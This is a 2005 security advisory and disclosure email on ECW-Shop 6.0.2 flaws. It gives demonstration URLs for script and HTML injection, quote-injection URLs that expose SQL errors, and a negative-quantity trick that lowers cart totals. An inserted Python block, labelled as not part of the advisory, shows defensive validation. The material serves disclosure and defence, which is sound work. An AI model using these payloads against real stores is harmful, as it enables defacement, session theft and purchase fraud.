SecurityTracker.com
SecurityTracker
Archives


Category:  Application (Commerce)  >  ECW-Shop
Vendors:  ECW-Shop
ECW-Shop Bugs Permit SQL Injection, Cross-Site Scripting, and Price Modification
SecurityTracker Alert ID:  1014734
SecurityTracker URL:  http://securitytracker.com/id?1014734
CVE Reference:  CVE-2005-2621, CVE-2005-2622, CVE-2005-2623
Updated:  Jun 8 2008
Original Entry Date:  Aug 19 2005
Impact:  Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 6.0.2
Description:  Several vulnerabilities were reported in ECW-Shop. A remote user can modify the shopping cart total price. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary HTML to be executed by the target user's browser. The code will originate from the site running the ECW-Shop software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'max' and 'ctg' parameters are affected.

Some demonstration exploit URLs are provided:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>

http://[target]/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1

A remote user can supply the following URLs to cause the system to disclose system information in an error message:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

It may be possible to inject SQL commands, but the report did not confirm SQL injection.

A remote user can add a negative quantity of an item to the shopping cart to cause the total price of the cart contents to be reduced by the appropriate amount.
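As an added illustration (not ECW-Shop code and not part of the advisory), the following Python models the server-side checks that close the three issues described above: a cart total that rejects non-positive quantities, shown beside the unchecked computation that reproduces the credit, and a validator for the 'min', 'max' and 'ctg' search parameters that keeps a stray quote out of the database layer and escapes the category before it is echoed back. The item ids are hypothetical; the prices are those from the reporter's example.

```python
import re
from decimal import Decimal
from html import escape

# Constructed catalogue: hypothetical item ids, unit prices in GBP
CATALOGUE = {"item-a": Decimal("4.99"), "item-b": Decimal("6.99")}

def cart_total_unchecked(lines):
    """Models the flaw: quantities are used as supplied, so a negative
    quantity is booked as a credit against the rest of the cart."""
    return sum(CATALOGUE[item] * qty for item, qty in lines)

def cart_total_checked(lines):
    """Hardened total: every item must exist in the catalogue and every
    quantity must be a positive integer; prices are never taken from the client."""
    total = Decimal("0")
    for item, qty in lines:
        if item not in CATALOGUE:
            raise ValueError(f"unknown item {item!r}")
        if isinstance(qty, bool) or not isinstance(qty, int) or qty < 1:
            raise ValueError(f"invalid quantity {qty!r} for {item!r}")
        total += CATALOGUE[item] * qty
    return total

def search_params(raw):
    """Validate the search parameters named in the advisory before use.
    'min' and 'max' must be plain non-negative integers, so a quote never
    reaches the SQL layer (and never surfaces as a mysql_num_rows() warning);
    'ctg' is HTML-escaped so it cannot inject markup when echoed into the page."""
    out = {}
    for name in ("min", "max"):
        value = raw.get(name, "")
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise ValueError(f"{name} must be a non-negative integer")
        out[name] = int(value)
    if out["min"] > out["max"]:
        raise ValueError("min must not exceed max")
    out["ctg"] = escape(raw.get("ctg", ""), quote=True)
    return out
```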

The vendor was notified on June 8, 2005.

John Cobb discovered these vulnerabilities.

Impact:  A remote user can modify the shopping cart total price.

A remote user may be able to inject SQL commands.

A remote user can also conduct cross-site scripting attacks.

Solution:  No solution was available at the time of this entry.
Vendor URL:  www.soft4e.com/
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "John Cobb" <johnc@nobytes.com>
Message History:   None.


Source Message Contents

Date:  Mon, 15 Aug 2005 23:29:10 +0100
From:  "John Cobb" <johnc@nobytes.com>
Subject:  [NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities

 
Hello All,

I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2

Authors Site: http://www.soft4e.com/

ECW Shop is described by its authors as:

ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.

+-[Examples:]--------------------------------------------------+

[1]------------------------------------------------------------+

XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script

[2]------------------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

Error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/search.php on line 109

[3]------------------------------------------------------------+

HTML Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>

http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1

[4]------------------------------------------------------------+

Cart/Order Manipulation:

You can add negative quantity value items to your cart to gain credit.

Example:

Add '-1' of an item with a value of £4.99
Add '1' of an item with a value of £6.99

Cart Total: £2.00

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE

JohnC@NoBytes.com
http://www.NoBytes.com


Copyright 2007, SecurityGlobal.net LLC